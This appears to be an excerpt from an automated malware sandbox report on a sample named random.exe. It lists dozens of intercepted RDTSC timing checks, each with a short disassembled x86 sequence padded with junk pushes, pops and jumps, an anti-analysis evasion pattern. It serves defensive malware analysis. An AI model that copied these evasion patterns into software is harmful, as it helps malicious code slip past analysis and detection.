              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4BF233 second address: 4BF25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007EFCE8B91D06h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFCE8B91D17h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C89E7 second address: 4C89EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C89EB second address: 4C89EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C89EF second address: 4C8A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFCE8B9234Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C8A05 second address: 4C8A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C8A0B second address: 4C8A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFCE8B92354h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007EFCE8B9234Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C8420 second address: 4C8426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C8426 second address: 4C842C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C842C second address: 4C844E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007EFCE8B91D06h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C8580 second address: 4C85A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B92359h 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C85A1 second address: 4C85B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007EFCE8B91D06h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C85B1 second address: 4C85C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFCE8B9234Ah 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C85C6 second address: 4C85D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFCE8B91D06h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C85D1 second address: 4C85DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007EFCE8B92346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4C85DD second address: 4C85E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4D44EE second address: 4D450B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007EFCE8B9234Ah 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 jo 00007EFCE8B9234Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4D7E50 second address: 4D7E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4D7E59 second address: 4D7E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007EFCE8B92352h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4D7FCC second address: 4D7FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4D7FD0 second address: 4D7FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B92354h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4D7FED second address: 4D801B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007EFCE8B91D11h 0x0000000b popad 0x0000000c popad 0x0000000d push edi 0x0000000e jmp 00007EFCE8B91D10h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4D801B second address: 4D8021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCF28 second address: 4DCF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFCE8B91D06h 0x0000000a jns 00007EFCE8B91D06h 0x00000010 popad 0x00000011 jnp 00007EFCE8B91D1Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCF41 second address: 4DCF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B9234Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCF53 second address: 4DCF78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFCE8B91D0Ch 0x00000008 jmp 00007EFCE8B91D0Bh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007EFCE8B91D06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCF78 second address: 4DCF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCF7C second address: 4DCF9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007EFCE8B91D12h 0x00000013 ja 00007EFCE8B91D06h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCF9F second address: 4DCFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCAD6 second address: 4DCAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007EFCE8B91D06h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCAE3 second address: 4DCAF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFCE8B92346h 0x0000000a jo 00007EFCE8B92346h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCAF3 second address: 4DCB01 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007EFCE8B91D12h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4DCC44 second address: 4DCC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4E73F0 second address: 4E73FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4E73FA second address: 4E73FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4E73FE second address: 4E7404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4EC72C second address: 4EC733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4EC578 second address: 4EC57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4EC57C second address: 4EC5AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92356h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007EFCE8B92351h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4EC5AA second address: 4EC5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jno 00007EFCE8B91D06h 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a je 00007EFCE8B91D06h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4F350A second address: 4F350E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4F350E second address: 4F3514 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4F36AE second address: 4F36B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFCE8B9234Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4F39C0 second address: 4F39C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 50416B second address: 504171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 504171 second address: 504198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFCE8B91D15h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 504043 second address: 504048 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508C72 second address: 508C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508C76 second address: 508CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFCE8B92357h 0x0000000b pop ebx 0x0000000c push edi 0x0000000d jp 00007EFCE8B92357h 0x00000013 jmp 00007EFCE8B92351h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508CB0 second address: 508CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508AA3 second address: 508AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFCE8B92346h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508AAD second address: 508ABD instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFCE8B91D06h 0x00000008 jnp 00007EFCE8B91D06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508ABD second address: 508ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508ADD second address: 508AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508AE1 second address: 508AFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007EFCE8B92354h 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 508AFF second address: 508B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 50D177 second address: 50D18E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFCE8B92353h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A205 second address: 51A223 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007EFCE8B91D15h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52EA84 second address: 52EA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007EFCE8B9234Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F571 second address: 52F575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F575 second address: 52F579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F579 second address: 52F584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F584 second address: 52F58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F58B second address: 52F590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F590 second address: 52F5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFCE8B92346h 0x0000000a jnc 00007EFCE8B92346h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F952 second address: 52F95C instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFCE8B91D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F95C second address: 52F970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007EFCE8B9234Eh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 52F970 second address: 52F976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 532AD4 second address: 532B03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jg 00007EFCE8B92346h 0x00000016 jng 00007EFCE8B92346h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 532B03 second address: 532B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007EFCE8B91D0Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFCE8B91D16h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 533C85 second address: 533C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 533C89 second address: 533C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 533C8D second address: 533C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0317 second address: 51A0337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 56h 0x00000005 mov eax, 70D20D77h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007EFCE8B91D0Ah 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0337 second address: 51A033D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A037F second address: 51A0383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0383 second address: 51A0389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0389 second address: 51A03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFCE8B91D17h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A03B5 second address: 51A03F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 192EDC32h 0x00000010 push ebx 0x00000011 mov al, E5h 0x00000013 pop edi 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop edi 0x0000001a mov di, ax 0x0000001d popad 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A03F1 second address: 51A03F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44D549 second address: 44D54F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0436 second address: 51A043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A043C second address: 51A0440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0440 second address: 51A047F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007EFCE8B91D0Fh 0x00000012 and si, FEFEh 0x00000017 jmp 00007EFCE8B91D19h 0x0000001c popfd 0x0000001d mov dx, cx 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A047F second address: 51A04AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B9234Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFCE8B92358h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A04AD second address: 51A04B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A04B1 second address: 51A04B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A04B7 second address: 51A0509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFCE8B91D10h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007EFCE8B91D0Dh 0x0000001a adc eax, 6B3B36A6h 0x00000020 jmp 00007EFCE8B91D11h 0x00000025 popfd 0x00000026 mov di, cx 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A05C1 second address: 51A05E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 push esi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFCE8B92354h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A05E6 second address: 51A05F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A05F5 second address: 51A05FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A05FB second address: 51A0668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edx] 0x0000000d jmp 00007EFCE8B91D16h 0x00000012 inc edx 0x00000013 pushad 0x00000014 jmp 00007EFCE8B91D0Eh 0x00000019 mov di, si 0x0000001c popad 0x0000001d test al, al 0x0000001f pushad 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007EFCE8B91D18h 0x00000027 sub si, 3A78h 0x0000002c jmp 00007EFCE8B91D0Bh 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 51A0668 second address: 51A0668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, 64BA9945h 0x0000000a popad 0x0000000b jne 00007EFCE8B922D9h 0x00000011 mov al, byte ptr [edx] 0x00000013 jmp 00007EFCE8B92356h 0x00000018 inc edx 0x00000019 pushad 0x0000001a jmp 00007EFCE8B9234Eh 0x0000001f mov di, si 0x00000022 popad 0x00000023 test al, al 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007EFCE8B92358h 0x0000002d sub si, 3A78h 0x00000032 jmp 00007EFCE8B9234Bh 0x00000037 popfd 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
